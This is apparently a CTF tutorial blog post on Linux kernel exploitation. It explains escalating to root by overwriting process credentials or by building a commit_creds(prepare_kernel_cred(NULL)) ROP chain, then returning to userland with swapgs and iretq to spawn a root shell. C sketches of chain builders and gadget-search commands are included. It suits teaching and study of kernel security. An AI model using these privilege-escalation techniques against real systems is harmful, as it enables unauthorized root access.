An Intro to Linux Kernel Pwn in CTF

Intro

In this post we take a brief look at Linux kernel pwn: what we need to do and how it works.

Linux kernel pwn is similar to userland pwn, except that the target is the kernel (or a kernel module). In most cases the vulnerability is in a custom Linux kernel module (LKM), which runs in ring 0 as part of the kernel and provides a service to userland. CTF kernel challenges usually run under QEMU and are typically shipped with the following files:

vmlinux, the Linux kernel. Sometimes only the compressed bzImage is provided, from which you can extract vmlinux. vmlinux is an ELF file, so you can run ROPgadget or ropper against it just as in userland pwn.
A Linux root file system image, usually a cpio archive that may additionally be compressed with gzip
A script to launch the emulator with specific configuration

Let’s go further now. Some basic knowledge of operating systems is required here.

Our goal

Our main goal in Linux kernel pwn is privilege escalation to root, since in most cases the “flag” can only be read by root.

Privilege escalation

First, let’s take a look at the structure that represents a process in the Linux kernel.

struct task_struct {
#ifdef CONFIG_THREAD_INFO_IN_TASK
	/*
	 * For reasons of header soup (see current_thread_info()), this
	 * must be the first element of task_struct.
	 */
	struct thread_info		thread_info;
#endif
	unsigned int			__state;

#ifdef CONFIG_PREEMPT_RT
	/* saved state for "spinlock sleepers" */
	unsigned int			saved_state;
#endif

    // ...........
    
    /* Process credentials: */

	/* Tracer's credentials at attach: */
	const struct cred __rcu		*ptracer_cred;

	/* Objective and real subjective task credentials (COW): */
	const struct cred __rcu		*real_cred;

	/* Effective (overridable) subjective task credentials (COW): */
	const struct cred __rcu		*cred;

    // ............
};

Here struct cred holds the uid and gid of the process. Obviously, if we can control the subjective credentials (cred) of a process, we can achieve privilege escalation.

Luckily, we have several ways to change our credentials:

Overwrite the cred of our process, found through the kernel’s linked list of processes, using an arbitrary kernel read/write primitive.
Find a code path in the kernel that sets the credentials of a process and reach it with kernel ROP.
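To make the first option more concrete, here is a minimal userland model of it. Everything in it is an assumption made for illustration: struct fake_cred is a simplified stand-in for the head of struct cred (the real layout depends on kernel version and configuration), and arb_write_fn is a hypothetical arbitrary-write primitive that a real exploit would have to build from the module's bug.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simplified userland stand-in for the head of struct cred.
 * ASSUMPTION: a 4-byte usage counter followed by eight 32-bit IDs; the
 * real layout depends on kernel version and configuration. */
struct fake_cred {
    uint32_t usage;
    uint32_t uid, gid, suid, sgid, euid, egid, fsuid, fsgid;
};

/* Hypothetical arbitrary-write primitive: copies len bytes to addr.
 * In a real exploit this would be built on the module's bug. */
typedef void (*arb_write_fn)(void *addr, const void *src, size_t len);

/* Zero every ID field of the cred at cred_addr, leaving usage untouched. */
void overwrite_cred_ids(void *cred_addr, arb_write_fn arb_write)
{
    uint32_t zeros[8] = {0};

    arb_write((char *)cred_addr + offsetof(struct fake_cred, uid),
              zeros, sizeof(zeros));
}

/* Userland mock of the primitive, so the sketch can be exercised. */
void mock_write(void *addr, const void *src, size_t len)
{
    memcpy(addr, src, len);
}
```

Calling overwrite_cred_ids(&c, mock_write) on a struct fake_cred c sets all eight IDs to 0 (root) and keeps the reference count as it was.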

Alternatively, we can hijack another process that already runs as root and gain arbitrary code execution in it. We will look at the second approach, kernel ROP, first, since it is almost the same as ROP in userland.

Kernel ROP

We need a way to assign new credentials to our process. Searching through the kernel source, we find:

/**
 * commit_creds - Install new credentials upon the current task
 * @new: The credentials to be assigned
 *
 * Install a new set of credentials to the current task, using RCU to replace
 * the old set.  Both the objective and the subjective credentials pointers are
 * updated.  This function may not be called if the subjective credentials are
 * in an overridden state.
 *
 * This function eats the caller's reference to the new credentials.
 *
 * Always returns 0 thus allowing this function to be tail-called at the end
 * of, say, sys_setgid().
 */

 int commit_creds(struct cred *new) { /* ... */ }

Exactly what we need! If we can obtain a cred that carries root privileges, we can use the function above to install it on our process (the current process). Luckily, we have:

/**
 * prepare_kernel_cred - Prepare a set of credentials for a kernel service
 * @daemon: A userspace daemon to be used as a reference
 *
 * Prepare a set of credentials for a kernel service.  This can then be used to
 * override a task's own credentials so that work can be done on behalf of that
 * task that requires a different subjective context.
 *
 * @daemon is used to provide a base for the security record, but can be NULL.
 * If @daemon is supplied, then the security data will be derived from that;
 * otherwise they'll be set to 0 and no groups, full capabilities and no keys.
 *
 * The caller may change these controls afterwards if desired.
 *
 * Returns the new credentials or NULL if out of memory.
 */

struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
	const struct cred *old;
	struct cred *new;

	new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
	if (!new)
		return NULL;

	kdebug("prepare_kernel_cred() alloc %p", new);

	if (daemon)
		old = get_task_cred(daemon);
	else
		old = get_cred(&init_cred);

	validate_creds(old);
    // ............
}

When daemon is NULL, old is set to init_cred:

struct cred init_cred = {
	.usage			= ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
	.subscribers		= ATOMIC_INIT(2),
	.magic			= CRED_MAGIC,
#endif
	.uid			= GLOBAL_ROOT_UID,
	.gid			= GLOBAL_ROOT_GID,
	.suid			= GLOBAL_ROOT_UID,
	.sgid			= GLOBAL_ROOT_GID,
	.euid			= GLOBAL_ROOT_UID,
	.egid			= GLOBAL_ROOT_GID,
	.fsuid			= GLOBAL_ROOT_UID,
	.fsgid			= GLOBAL_ROOT_GID,
	.securebits		= SECUREBITS_DEFAULT,
	.cap_inheritable	= CAP_EMPTY_SET,
	.cap_permitted		= CAP_FULL_SET,
	.cap_effective		= CAP_FULL_SET,
	.cap_bset		= CAP_FULL_SET,
	.user			= INIT_USER,
	.user_ns		= &init_user_ns,
	.group_info		= &init_groups,
	.ucounts		= &init_ucounts,
};

init_cred has everything we need! So our ROP chain should be equivalent to:

commit_creds(prepare_kernel_cred(NULL));

after which we can achieve privilege escalation.
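As a rough sketch, the call above can be laid out as a ROP chain like this. The struct and its field names are illustrative assumptions: the two gadgets ("pop rdi; ret" and "mov rdi, rax; ret") and both function addresses have to be located in the target vmlinux, and real kernels often only offer messier variants of the second gadget.

```c
#include <stddef.h>
#include <stdint.h>

/* Addresses the exploit author must supply for the target kernel.
 * ASSUMPTION: every field name here is illustrative; the two gadgets
 * ("pop rdi; ret" and "mov rdi, rax; ret") must be found in vmlinux. */
struct kaddrs {
    uint64_t pop_rdi_ret;
    uint64_t mov_rdi_rax_ret;
    uint64_t prepare_kernel_cred;
    uint64_t commit_creds;
};

/* Write the chain for commit_creds(prepare_kernel_cred(NULL)) into chain
 * and return the number of 8-byte slots used. */
size_t build_privesc_chain(uint64_t *chain, const struct kaddrs *k)
{
    size_t n = 0;

    chain[n++] = k->pop_rdi_ret;          /* rdi = next slot */
    chain[n++] = 0;                       /* NULL argument */
    chain[n++] = k->prepare_kernel_cred;  /* rax = new root cred */
    chain[n++] = k->mov_rdi_rax_ret;      /* rdi = rax */
    chain[n++] = k->commit_creds;         /* install the cred */
    return n;
}
```

Note that this relies on prepare_kernel_cred(NULL) falling back to init_cred as in the listing above. As far as I know, kernels from 6.2 onwards no longer do so, and there a common substitute is to pass the address of init_cred straight to commit_creds.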

Back to userland

After getting root privileges, we are still in kernel mode. Our final goal is to spawn a root shell in userland, so we need to return to user mode with the following steps.

swapgs
iretq
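iretq pops RIP, CS, RFLAGS, RSP and SS from the stack, so the exploit needs valid userland values for them. A common approach is to record them in userland before triggering the bug. The following is a minimal sketch assuming x86-64 and GCC/Clang inline assembly; the function and variable names are my own choice.

```c
#include <stdint.h>

/* Userland register values to hand back to iretq later. */
uint64_t user_cs, user_ss, user_rsp, user_rflags;

/* Record CS, SS, RSP and RFLAGS of the current (userland) context.
 * x86-64 only, GCC/Clang inline assembly in AT&T syntax. */
void save_state(void)
{
    __asm__ volatile(
        "mov %%cs, %0\n\t"
        "mov %%ss, %1\n\t"
        "mov %%rsp, %2\n\t"
        "lea -128(%%rsp), %%rsp\n\t"  /* step over the red zone */
        "pushfq\n\t"
        "pop %3\n\t"
        "lea 128(%%rsp), %%rsp\n\t"   /* lea leaves the flags alone */
        : "=r"(user_cs), "=r"(user_ss), "=r"(user_rsp), "=r"(user_rflags)
        :
        : "memory");
}
```

save_state() would be called once at the start of the exploit, and the four saved values are later placed on the kernel stack behind the iretq gadget.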

Take a look at how the Linux kernel itself returns to user mode (arch/x86/entry/entry_64.S):

SYM_CODE_START_LOCAL(common_interrupt_return)
SYM_INNER_LABEL(swapgs_restore_regs_and_return_to_usermode, SYM_L_GLOBAL)
#ifdef CONFIG_DEBUG_ENTRY
	/* Assert that pt_regs indicates user mode. */
	testb	$3, CS(%rsp)
	jnz	1f
	ud2
1:
#endif
	POP_REGS pop_rdi=0

	/*
	 * The stack is now user RDI, orig_ax, RIP, CS, EFLAGS, RSP, SS.
	 * Save old stack pointer and switch to trampoline stack.
	 */
	movq	%rsp, %rdi
	movq	PER_CPU_VAR(cpu_tss_rw + TSS_sp0), %rsp
	UNWIND_HINT_EMPTY

	/* Copy the IRET frame to the trampoline stack. */
	pushq	6*8(%rdi)	/* SS */
	pushq	5*8(%rdi)	/* RSP */
	pushq	4*8(%rdi)	/* EFLAGS */
	pushq	3*8(%rdi)	/* CS */        <--- SS, RSP, EFLAGS and CS: save them in userland first, they are restored here
	pushq	2*8(%rdi)	/* RIP */       <--- point this at the code that spawns our root shell

	/* Push user RDI on the trampoline stack. */
	pushq	(%rdi)

	/*
	 * We are on the trampoline stack.  All regs except RDI are live.
	 * We can do future final exit work right here.
	 */
	STACKLEAK_ERASE_NOCLOBBER

	SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi

	/* Restore RDI. */
	popq	%rdi
	SWAPGS
	INTERRUPT_RETURN    <--- iretq

So the layout of the stack should be:

+--------------------------------+
| commit new cred to our process |
+--------------------------------+
| addr of swapgs_ret             |
+--------------------------------+
| addr of iretq                  |
+--------------------------------+
| previous rip(spawn root shell) |
+--------------------------------+
| previous cs                    |
+--------------------------------+
| previous eflags                |
+--------------------------------+
| previous rsp                   |
+--------------------------------+
| previous ss                    |
+--------------------------------+
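The lower part of this layout can be sketched in C as follows. The names are illustrative assumptions: swapgs_ret and iretq stand for gadget addresses found in the target vmlinux, struct user_ctx holds userland register values saved before triggering the bug, and get_shell is a hypothetical landing function.

```c
#include <stddef.h>
#include <stdint.h>
#include <unistd.h>

/* Saved userland context, e.g. captured before triggering the bug. */
struct user_ctx {
    uint64_t cs, rflags, rsp, ss;
};

/* Userland landing point: only start a shell if we really are root. */
void get_shell(void)
{
    if (getuid() == 0)
        execl("/bin/sh", "sh", (char *)NULL);
    _exit(1);
}

/* Append the return-to-user part of the chain, in the order of the
 * diagram above, starting at chain[n]; returns the new slot count.
 * ASSUMPTION: swapgs_ret and iretq are gadget addresses found in the
 * target vmlinux; both parameter names are illustrative. */
size_t append_iret_frame(uint64_t *chain, size_t n,
                         uint64_t swapgs_ret, uint64_t iretq,
                         const struct user_ctx *u)
{
    chain[n++] = swapgs_ret;                      /* swapgs; ret */
    chain[n++] = iretq;                           /* iretq pops the rest */
    chain[n++] = (uint64_t)(uintptr_t)get_shell;  /* RIP */
    chain[n++] = u->cs;
    chain[n++] = u->rflags;
    chain[n++] = u->rsp;
    chain[n++] = u->ss;
    return n;
}
```

On kernels with page table isolation enabled, separate swapgs and iretq gadgets are usually not enough, because the page tables also have to be switched. A common alternative there is to jump into swapgs_restore_regs_and_return_to_usermode, shown in the listing above, instead.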

ROPgadget sometimes fails to find iretq. In that case we can search the disassembly directly with the following command.

objdump -j .text -d ./vmlinux | grep iretq | head -1
ffffffff81050ef2: 48 cf                	iretq
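Since iretq is encoded as the two bytes 48 cf, as the output above shows, the same search can be done on raw bytes. The following is a small sketch of such a scan; find_iretq is a hypothetical helper, and turning the returned offset into a gadget address (by adding the load address of the scanned region) is left to the caller.

```c
#include <stddef.h>
#include <stdint.h>

/* Return the offset of the first "48 cf" (iretq) byte pair in buf,
 * or -1 if the pattern does not occur. */
long find_iretq(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i + 1 < len; i++) {
        if (buf[i] == 0x48 && buf[i + 1] == 0xcf)
            return (long)i;
    }
    return -1;
}
```

Unlike grepping a linear disassembly, a byte scan also finds occurrences that start in the middle of another instruction.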

After returning to userland, you will get a root shell.